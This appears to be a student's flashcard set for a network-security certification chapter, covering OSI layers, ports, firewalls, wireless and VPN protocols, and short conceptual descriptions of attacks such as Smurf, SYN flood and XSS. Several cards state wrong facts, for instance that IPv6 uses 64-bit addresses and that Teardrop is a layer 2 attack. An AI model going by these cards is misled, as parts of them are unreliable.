Chapter 4: Communication and Network Security Flashcards
-mulithomed firewall
Multi-homed firewalls may be used to setup a DMZ with a single firewall. (see next slide)
On any multi-homed machine, IP forwarding should be disabled.*
802.11 wireless protocols
802.11a 54Mbps5Ghz8 channels802.11b11Mbs2.4Ghz (same as other home devices)802.11g54Mbs2.4Ghz802.11i : Wireless with security. First standard to require WPAII802.11n100Mbs2.4Ghz or 5Ghz
802.15
Bluetooth
802.1x and eap
802.1x is a port based network access control and includes
EAP.
- EAP is an auth frameworks that describes many specific auth protocols PORT Based Auth. at Layer 2 for both wired and wireless
ad-hoc and infrastructure wireless
ah-hoc wirles cards to wireless cares infrastrcute is through access points
Application Proxies - Firewallpros & cons?
Like circuit layer proxies, but actually understand the application/protocol they are proxying.This allows for additional security as they can inspect the data for protocol violations or content.AdvantagesApplication proxies understand the protocol, so they can add extra securityCan have advanced logging/auditing and access control featuresEx. Restrict users to only allowed websitesEx. Inspect data for protocol violationsEx. Inspect data for malware (viri etc)DisadvantagesExtra processing requires extra CPU (slower)Proxies ONLY understand the protocols they were written to understand. So you generally have a separate application proxy for EACH protocol you want to proxyexamples: smtp proxies, ftp proxies
ARP
I’m looking for 192.168.1.2’s MAC addressanswer: that’s me at 00:af:14:b3:bc:12
Layer 2 take ip from L3 for the test say layer 2
Map IP address to Mac address via broadcast
it it then added to the ARP cache
arp poisoning: change mac address to bad server…
asymmetric dsl
fast download less upload
autonomous network how many entitites
one
Blue Bugging
More serious
Allows full use of phone
Allows one to make calls
Can eavesdrop on calls
Blue Jacking
sending spam to bluetooth devices
Blue Snarfing
Copies info off remote devices
Bonk
similar to Teardrop manipulates how a pc reassembles a packet and allows of too large a packet
Buffer Overflow
Attacks a specific type of memeory on a system …the buffers best avoided with input validation. too much to handle…
CHAP
does not expose the cleartext password and is not susceptible to replay attacks. CHAP relies on a shared secret: the password. The password is securely created (such as during account enrollment) and stored on the CHAP server. Since both the user and the CHAP server share a secret (the plaintext password), they can use that secret to securely authenticate.
circuit Switching
all data follows same pathPSTNISDNDSLT-carriers
Data Diddling
Altering/Manipulating data, usually before entry
DCE
similar to kerberos developed by Open Group The Distributed Computing Environment (DCE) is a software system developed in the early 1990s by a consortium that included Apollo Computer (later part of Hewlett-Packard), IBM, Digital Equipment Corporation, and others. The DCE supplies a framework and toolkit for developing client/server applications.
DDos
use of Control Machines (Handlers) and Zombies (Bots) many machines making the attack
Dial up protocol
PPP Point to Point Protocol: Provides Layer 2 framing for dial-up. Needs other protocols for securityEncryption: MPPEAuthentication:PAP (Password Authentication Protocol): Clear TextCHAP (Challenge Handshake Authentication Protocol) Client responds to a challenge from the server. The only way the client can answer correctly is if the correct password had been entered.EAP (Extensible Authentication Protocol) Extends capabilities beyond passwords (smart cards, biometrics, token devices, etc)
DMZ
A buffer zone between an unprotected network and a protected network that allows for the monitoring and regulation of traffic between the two.
DNS port
UDP port 53 tcp port 53 large answers ie zone xfer
Dos
Denial of Service - overwhelm a system and disrupt its availability
DSL
layer 1
Dynamic Packet Filtering Firewalls
Like a state full firewall but more advanced. Can actually rewrite rules dynamically.Some protocols such as FTP have complex communications that require multiple ports and protocols for a specific application, packet and statefull filter cannot handle these easily, however dynamic packet filter can as they can create rules on the fly as needed.
Ethernet
Layer 2 transports data via frames
Ethernet
Most common form of LAN networking, has the following characteristicsShares mediaBroadcast and collision domains (see next slides)CSMA/CDSupports full duplex with a switchDefined by IEEE 802.3
Fraggle
Similar to smurf but uses UDP vs IMCP layer 4 attack. you can block distrubed attacks on router to mitigate.
frame relay
Frame Relay is a packet-switched Layer 2 WAN protocol that provides no error recovery and focuses on speed. Higher-layer protocols carried by Frame Relay, such as TCP/ IP, can be used to provide reliability. Frame Relay multiplexes multiple logical connections over a single physical connection to create Virtual Circuits; this shared bandwidth model is an alternative to dedicated circuits such as T1s. A PVC (Permanent Virtual Circuit) is always connected, analogous to a real dedicated circuit like a T1. A Switched Virtual Circuit (SVC)
FTP
uses tcp to guarantee delivery
vs
tftp uses udp faster doesn’t guanatee delivery.
http
port 80
https port
443
imap port
internet massage access protocol port 143
imcp
L3 used to troubleshoot and report error conditions
ICMP – “IP helper”Protocol behind echoing utilities like PING and Traceroute
Frequently exploited
- LOKI :sending data in ICMP messages header (not supposed to be there) —covert Channel
- Ping of Death:violates the MTU (maximum transmission unit) size
- Ping Floods: Lots of ping traffic
- SMURF: Uses spoofed source address (Target) and directed broadcasts to launch a DDos
infrastructure as a service
storing things in the cloud. services provided by the cloud vs local…
IPsec
IPv4 has no built-in confidentiality; higher-layer protocols such as TLS are used to provide security. To address this lack of security at Layer 3, IPsec (Internet Protocol Security) was designed to provide confidentiality, integrity, and authentication via encryption for both IPv4 and IPv6. IPsec is a suite of protocols; the major two are Encapsulating Security Protocol (ESP) and auth header AH
IPv4
32 bit source and destination address
IPv6
64 bit destination address
ISDN
PRI and BRI
L2TP
Layer 2 Tunneling ProtocolCisco designed L2F to break free of dependence on IP networks, but kept it proprietary.L2TP was a combination of L2F and PPTPDesigned to be implemented in software solutionsTHERE IS NO SECURITY with L2TP. It MUST use IPSec to secure
L3 Firewall
Static Packet Filters: Base decisions on Source/Destination IP address and port
L5 Firewall
Stateful Inspection Knowledge of who initiated the session. Can block unsolicited replies. Protocol Anomaly firewalls.
L7 Firewall
Application Proxies/Kernel Proxies: Make decisions on Content, Active Directory Integration, Certs, time…etc
Land Attack
Creates a “circular reference” on a machine. Sends a packet where source and destination are the same.
Layer 1 Threats
Physical - TheftUnauthorized AccessVandalismSniffingInterferenceData Emanation
Layer 2 two sub layers
Data Layer —– sublayers are: MAC Media Access Control xfters data down to phys layer & Logical Link Control up to L3. -Error Dectectiondevices: switches and bridgesEthernet card and its mac addresss
Layer 3
network layer describes routing moving data from a system on one lan to a system on another. IP address and routers ICMPOther protocols that “work” on this layer are: ICMP – IP “helpers” (like ping) IGMP – Internet Group Message Protocol IPRouters All protocols that start with “I” (except IMAP) Ping Floods, Pings of Death, Loki, Smurf
Layer 4
OSI Layer 4 Transport – Provides end-to-end data transport services and establishes a logical connection between 2 computers systems
”The “pony express”
Protocols used at layer 4:
- SSL/TLS (Discussed in Cryptography Chapter)
- TCP UDPTCP &
- UDP and L4 protocols SSL/TLS
Layer 5
OSI Layer 5 (Session) – responsible for establishing a connection between two APPLICATIONS! (either on the same computer or two different computers)
- Create connection
- Transfer data
- Release connection
TCP - Does session oriented services
.Session layer manages sessions which provide maintenance on connections. connections between applications RPC’s , simplex 1/2 duplex, full duplex
setup, maintainance and teardown of session
Layer 6
OSI Layer 6 Presentation Layer – presents the data in a format that all computers can understand
Think 3 things: Formating, Compression and Encryption
testable - This is the only layer of OSI that does NOT have any protocol.
- Concerned with encryption, compression and formatting
Making sure data is presented in a universal format
File level encryption
Removing redundancy from files (compression)
Presentation Layer - presents data to the application concepts include data conversion, ASCII and image formats gif, jpeg, tiff
Layer 7
APPLICATION Layer
This defines a protocol (way of sending data) that two different programs or applications understand.
- HTTP, HTTPS, FTP, TFTP, SMTP, SNMP, etc.
- Application Proxies
- Non-Repudiation
- Certificates
- Integration with Directory SErvices
- Time awareness.
- Application- web brower, word processor etc.Procy Firewalls
- Content Inspection
if you don’t know what application try layer 7 cause there’s a bunch!
LEAP
lightweight extensible auth protocol cisco proprietary has security flaws
Least Secure Type of Cable
Twisted - Pair
Logic Bomb
malicious code that lays dormant until a logical even occurs.
Logical Link Layer
L2 - Error Detection
Loki Attack
Information is stored in IMCP header (covert channel)
MAC - Physical 1st Part
L2 - DataMedia Access control Addressing/Resolution and Media Access Determination-ARP (Address Resolution Protocal)-RARP (Reverse Address Resolution Protocol)
MAC - Physical 2nd Part
L2 - Data MAC Media access control**CSMD/CD Carrier Sense Mutl. Access w/collision Detection 802.3 Ethernet - waits for clear then starts talking**CSMA/CA Carrier Sense Mutl. Access w/collision Avoidance 802.11 Wireless - Signals intent to talkToken Passing: 24 bit control frame passed around the network environment..determine who can transmit.
MAN
Metropolitan area network
MPLS
Mulit Protocol Labeled Switching
- MPLS is used to create cost effective, private Wide Area Networks (WANs) faster and more secure than regular routed “public” IP networks like the internet.
- More secure than the public internet, because a “virtual” private network (end-to-end circuit)can be built just for your organization
- Since it’s a private network, we don’t have to configure and maintain tradition encryption based VPN equipment anymore, and can also avoid the latency and delay inherent in the tech.
- Provides QoS for VOIP
- Purely Layer 3 technology.
NAT
one to one mapping private to public
3 ranges of internal
192.168
10.
172.16.x.x-172.31.x.x
PAT-is port translation allows you to map many internal to one external…
Network Perimeter concept
choke points
NIS
a distributed database system that lets computers share sets of files…does not support md5
OSPF
because RIP could not scale well in large networks. Open Shortest Path First Protocal was created. It support hierarchies and the simultaneouse use of multiple paths.
packet Filter
Uses Access control lists (ACLs), which are rules that a firewall applies to each packet it receives.Not state full, just looks at the network and transport layer packets (IP addresses, ports, and “flags”)**Does not look into the application, cannot block viri etc.**Generally do not support anything advanced or customPacket filters keep no state
Packet Switching
- X.25
- Frame Relay
- ATM
- VOIP
- MPLS
- Cable Modems
PAP
PAP (Password Authentication Protocol) is a very weak authentication protocol. It sends the username and password in cleartext. An attacker who is able to sniff the authentication process can launch a simple replay attack, by replaying the username and password, using them to log in. PAP is insecure and should not be used.
PAT
mult. private address to share one public address.PAT looks at the IP and transport layer port number and rewrites both*
Ping Flooding
overwhelm system with multitude of pings. via imcp
Ping of Death
sending a ping packet that violates the Max Trans Unit. a huge packet
IMCP
Platform as a service
is all about application hosting
pop3 port
110
PPP
L2 that adds CIA via point to point links
PPTP
Point to Point Tunneling ProtocolBased on PPP (uses MPPE for encryption and PAP, CHAP or EAP for authentication)Lead by Microsoft protocol for a tunneling VPNOnly works across IP networksRemote user connects to ISP, gets an Internet AddressEstablishes VPN connection to work VPN server, get’s Internal IP address.Sends private IP packets encrypted within other IP packets.
Proxy Firewalls - Circuit Level pros & cons?
- A circuit-level gateway is a type of firewall. Circuit level gateways work at the session layer of the OSI model, or as a “shim-layer” between the application layer and the transport layer of the TCP/IP stack. They monitor TCP handshaking between packets to determine whether a requested session is legitimate.
Application Proxies
advantages
- understand the protocol, so they can add extra security
- can have advanced logging/auditing and acess control features
- ex. restrict users to only allowed website
- inspect data for protocol violations
- inspect data for malware
Disadvantages
- extra processing
- proxies only understand the protocols the were written to understand. do you generally have a seperate application proxy for each protocol.
Examples:
- internet security and acceleration server… ms web proxy
- smtp proxies
- ftp proxies
RDP
remote desk protocol tcp port 3389
RFC 1918
10.x.x.x172.16.x.x-172.31.x.x192.168.x.x
SAAS
Office 365 online for example.
word on the cloud.
Salami
many small attacks add up to equal a large attack
office space type of account
screened subnet
In a screen subnet, there is a separate firewall on both sides of the DMZ.When using this model it is recommended that each firewall be a different vendor/product.Diversity of defense*
Security Zones - Firewall
DMZ
bastion hosts - a hardened server
vender divesity is good..
SIP
Consists of the User agent client an the user agent server user for voip
smtp
simple mail transport protocol port 25
Smurf
uses IMCP directed broadcasts. L3 attack.
Block distributed broadcasts on routers to stop it.
Sniffing
Capturing and Viewing packet through the use of a Protocol analyzer best defense encrypt.
Socket
When a tcp or udp message is formed, a sourceand a destination port are contained in the header info along with source and IP addresses…this makes a socket.
ssh
port 22
Stateful Firewall
Layer 5
-router keeps track of a connections in a table. It knows which conversations are active, who is involved etc.-
It allows return traffic to come back where a packet filter would have to have a specific rule to define returned traffic-
More complex, and can launch DoS against by trying to fill up all the entries in the state tables/use up memory.-
If rebooted can disrupt conversation that had been occurring.
Context dependant access control*
stateful firewall
Layer 5
Stateful firewalls have a state table that allows the firewall to compare current packets to previous ones. Stateful firewalls are slower than packet filters, but are far more secure. Computer 1 sends an ICMP Echo Request to
stateless firewall layer
3
Switch
A network Switch is just a multi-port bridge. Switches will often have 24 or more ports, and learns which MAC addresses are on which ports.
Works at layer 2 (data link)
On a switch a computer can send data AND receive data at the same time (full duplex… increasing performance by up to 2x)
On a switch each port is it’s own collision domain, and will not have a collision, therefore allowing line speed communication on each port A switch does not alter broadcast domains
A switch only sends traffic from the sending computer to the receiving computer, therefore stops sniffing (watch for MAC flooding attacks though)
Since switches inspect the MAC address on all traffic, a switch can be programmed to only allow certain MAC addresses to communicate, and ignore other MAC addresses.
Syn Flood
exploits 3 way handshake TCP layer 4 attack. need stateful firewall to prevent
Syn Flood
A SYN flood is a form of denial-of-service attack in which an attacker sends a succession of SYNrequests to a target’s system in an attempt to consume enough server resources to make the system unresponsive to legitimate traffic.
Layer 4 attack
TCP
Transmission control Protocol:Connection oriented “guaranteed” delivery. ***Advantages
- Easier to program with
- Truly implements a session
- Adds security
***Disadvantages
- More overhead / slower
- SYN Floods
KNOW OSI and mapping…
TCP - Handshake
Reliable connection-oriented protocolHas a guaranteed delivery based on the handshake process
SYN ———> hey open an area in memory
SYN/ACK————>
ACK
TCP Sequence Number
a way of ensuring that the message is delivered to teh appropriate destination and from its appropriate sender.
TCP/IP Protocols
UDP - user data protocal IMCP internet control message protocal etc.
Tear Drop
sending malformed packets which the OS doesn’t know how to re-assemble L2 Attack
telnet
tcp port 23
Trojan Horse
One program (usually type of Malicious code) masquerades as another. common means of distributing back-door programs
types of EAP
leap, eap-tls, eap-ttls and peap
udp
user datagram protocol lossy apps
UDP
User Datagram Protocol:
- Connectionless
- Unreliable
- No handshaking
- Desirable when “real time” transfer is essential
- Media Streaming, Gaming, live time chat, etc
- FTP uses TCP
- TFTP uses UDP
unsolictated Reply
sending a reply to a question that was never asked.
Virus
A piece of malicious code that can take many forms.
Needs a host, and action by user to spread.
VNC port #
Virtual Network computing port 5900
VOIP Security Issues
Eavesdropping (greatest threat) Enable s/rtp secure real time protocal
Toll Fraud
Vishing - fishing using phon
SPIT - spam of telephone
Performance issues - Jitter, Latency
VPN - tunneling
A function of VPNs - Tunnel encapsulates one protocol within another protocol to create a virtual network.Can encrypts original IP headersCan encrypts dataAllows for routing non routable protocols and IP addressesCan provide remote/internal IP addressesDifferent protocolsPPTPL2TPIPSEC
WAN - Circuit Switching
Anything that has to do the the telephone system
All data follow the same path
PSTN
ISDN
DSL
T-Carriers
WAP
Wireless Application Protocola protocol developed mainly to allow wireless devices (cell phones) access to the Internet.Requires a Gateway to translate WAP HTML (see visual)Uses WTLS to encrypt data (modified version of TLS)Uses HMAC for message authenticationWAP GAP* problem (see visual and explain)A lot of wireless devices don’t need WAP anymore.
Wardialing
RAS attack find phone number that has a modem
WEP
WEP Wired Equivalent Privacy
Shared authentication passwords
Weak IV (24 bits) (initalization Vector)
IV transmitted in clear text
RC-4 (stream cipher)Easily crackable
Only option for 802.11b
Wireless Security Problems
Unauthorized accesssniffingWar drivingUnauthorized access points (Man in the middle)
Worm
Similar to a Virus, but does not need a host and is self - replicating
WPA
Wi-Fi Protected AccessStronger IV
Introduced TKIP
Still used RC-4 it needed to maintain backwards compatibility.
WPA2
Wi-Fi Protected Access
WPA2
- AES
- CCMP
- NOT backwards compatible
WPA and WPA2 Enterprise
- Uses 802.1X authentication to have individual passwords for individual users
- RADIUS
Firewall Static Packet Filter
layer 3 static packet filtering - screen router with access control lists all or nothing devices.
layer 5 stateful firewalls-
Session Hijack
Where an attacker steps in between two host and either monitors the exchange, or often disconnects one. Session hijacks are types of Man in the Middle attacks. Encryption prevents sniffing and mutual authentication would prevent session hijack.
cross-site request forgery…a type of hijack…
Firewall Best Practices
media gateway
is the translation betewwn diparate telecommunications networks. VOIP Media gateways perform the conversion between time dividsion multiplexing voice to VOIP. as a secruity measure the numver of calls via media gateways should be limited to avoid DOS, hijacking, etc…
Persistant XSS vulnerability
is targeted at bew sites that allow user to input data that is stored in a database for similar location. the coded can be automatic withour luring an unsuspecting user.
AKA - second- order vulnerability
non persistant vulnerabilty
enable an attacker to inject malicious code into vulnerable web pages. Unsuspecting user visits infected page with a rouge script to steal the victims sensitive information such as cookies or session IDs.
DOM Attack
XSS cross site scripting uses the Document Object Model to modify client side java script causes the victimes browers to execute the malicious java code.
IGP
Internet gateway protocal handles routing task between heach AS atonomous systems
IGRP
interisor gateway routing protocol is a distance -vector routing protocal that was developed by cisco.
RIP - routing information protocal is a standard that outines how routers exchange routing table data as is considered a distance vector protocal which means it calulates the shorted length from source to destination.
IGRP is better but is it propiatary to cisco—RIP is free
type of routing protocols
indicate how routers talk to eachother
2 types
distance vector and link state routing
distance vector just looks at hops
link state builds a topology database of the network. looks at more variable than the number of hops.
EAP
Extensible Auth Protocol
Provides a framework to enable many type of authentifiation techniques.
IEEE standards
- 1AR - a unique id for a device
- 1AE - data encrption and integrity
- 1AF- key agreements session keys
hypervisor
the sofware component that carries out virtual machine management and oversees guest system software execution.
Common ports
ftp, telnet, smtp, dns
FTP - Port 21
Telnet - Port 23
SMTP - Port 25
DNS - Port 53
ip header protcol number
udp, igmp, tcp, imcp
ServiceProtocol Number
Internet Control Message Protocol (ICMP) 1
Transmission Control Protocol (TCP) 6
User Datagram Protocol (UDP) 17
General Routing Encapsulation
(PPTP data over GRE) 47
ecure HTTP (S-HTTP).
An early standard for encrypting HTTP documents, Secure HTTP (S-HTTP) is designed to send individual messages securely. SSL is designed to establish a secure connection between two computers.
